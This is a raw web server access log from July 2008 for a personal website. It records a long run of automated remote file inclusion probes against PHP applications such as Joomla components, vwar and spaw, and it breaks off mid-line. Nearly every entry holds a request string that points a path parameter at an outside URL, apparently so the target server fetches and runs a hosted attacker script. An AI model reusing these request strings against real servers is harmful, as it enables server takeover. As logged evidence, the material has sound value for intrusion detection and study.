81.169.158.65 - - [24/Jul/2008:08:28:21 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:28:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:28:22 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:28:22 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:28:32 -0700] "GET /logs/access_080301.log//components/com_flyspray/startdown.php?file=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:08:28:32 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:08:28:32 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [24/Jul/2008:08:28:32 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:28:33 -0700] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:28:34 -0700] "GET /convert/mvcw.php?vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:28:34 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:29:03 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:29:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:29:03 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.109.76.232 - - [24/Jul/2008:08:29:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 200 57428 "-" "libwww-perl/5.803" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:29:11 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.109.76.232 - - [24/Jul/2008:08:29:12 -0700] "GET //?path%5Bdocroot%5D=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 200 18433 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.68.170 - - [24/Jul/2008:08:29:34 -0700] "GET /logs/access_080110.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.metal-headz.co.uk//modules/coppermine/include/.../.../.../.../.../.../idsc1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:29:36 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:08:29:37 -0700] "GET /bikes/GPS/?S=A HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:29:38 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18557 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:29:39 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.27.149.4 - - [24/Jul/2008:08:29:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.27.149.4 - - [24/Jul/2008:08:29:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:30:05 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:30:05 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:30:05 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:30:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:30:58 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:30:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:30:59 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:30:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:31:02 -0700] "GET /logs/access_080326.log/errors.php?error=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:31:19 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:31:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:31:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:31:20 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:31:20 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:31:20 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:31:45 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:31:50 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:31:54 -0700] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.78.5 - - [24/Jul/2008:08:31:58 -0700] "GET /errors.php?error=http://ashraf.site88.net/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
208.186.78.5 - - [24/Jul/2008:08:31:58 -0700] "GET /logs/errors.php?error=http://ashraf.site88.net/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.220.202.38 - - [24/Jul/2008:08:32:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fdmclan.net/barracks/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.220.202.38 - - [24/Jul/2008:08:32:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fdmclan.net/barracks/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:32:21 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:32:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:32:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:32:25 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:32:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:32:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:32:30 -0700] "GET /logs/get_header.php?vwar_root=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:32:31 -0700] "GET /get_header.php?vwar_root=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:32:49 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:08:32:56 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:33:16 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:33:19 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:33:40 -0700] "GET /logs/get_header.php?vwar_root=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:33:41 -0700] "GET /get_header.php?vwar_root=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:02 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:02 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:02 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.109.76.232 - - [24/Jul/2008:08:34:32 -0700] "GET /logs/access_080329.log//?path%5Bdocroot%5D=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.109.76.232 - - [24/Jul/2008:08:34:34 -0700] "GET //?path%5Bdocroot%5D=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 200 18417 "-" "libwww-perl/5.803" "www.dmulk.com"
85.109.76.232 - - [24/Jul/2008:08:34:35 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 200 57428 "-" "libwww-perl/5.803" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:35 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:35 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:34:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:34:58 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:34:58 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:34:58 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:35:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.90.77.43 - - [24/Jul/2008:08:35:43 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.destarre.be/language/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.90.77.43 - - [24/Jul/2008:08:35:45 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.destarre.be/language/t.txt??? HTTP/1.1" 200 18427 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:08:36:06 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:08:36:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 200 18409 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.231.6 - - [24/Jul/2008:08:36:12 -0700] "GET /blog/index.php/2008/06/?show=gallery HTTP/1.1" 200 48136 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
189.77.91.153 - - [24/Jul/2008:08:36:17 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:36:38 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:36:39 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:36:39 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:36:41 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:36:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:36:43 -0700] "GET /logs/access_071218.log//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
117.47.222.119 - - [24/Jul/2008:08:36:47 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.172.53.219 - - [24/Jul/2008:08:36:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:37:15 -0700] "GET /logs/access_080315.log//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:37:16 -0700] "GET //index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18525 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:37:16 -0700] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:37:26 -0700] "GET /logs/access.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:37:27 -0700] "GET /errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:37:27 -0700] "GET /logs/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.249.133 - - [24/Jul/2008:08:37:49 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.249.133 - - [24/Jul/2008:08:37:50 -0700] "GET /xGB.php?act=admin&do=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:37:50 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.249.133 - - [24/Jul/2008:08:37:50 -0700] "GET /logs/xGB.php?act=admin&do=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.249.133 - - [24/Jul/2008:08:37:50 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:07 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:08 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:08 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:11 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:38:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:38:21 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:38:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [24/Jul/2008:08:38:22 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:38:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [24/Jul/2008:08:38:22 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:38:27 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:38:33 -0700] "GET /logs/access_080218.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:34 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:45 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:46 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:38:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:39:03 -0700] "GET /logs/access_080329.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:39:08 -0700] "GET /logs/access_080207.log//modules/vwar/admin/admin.php?vwar_root=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:39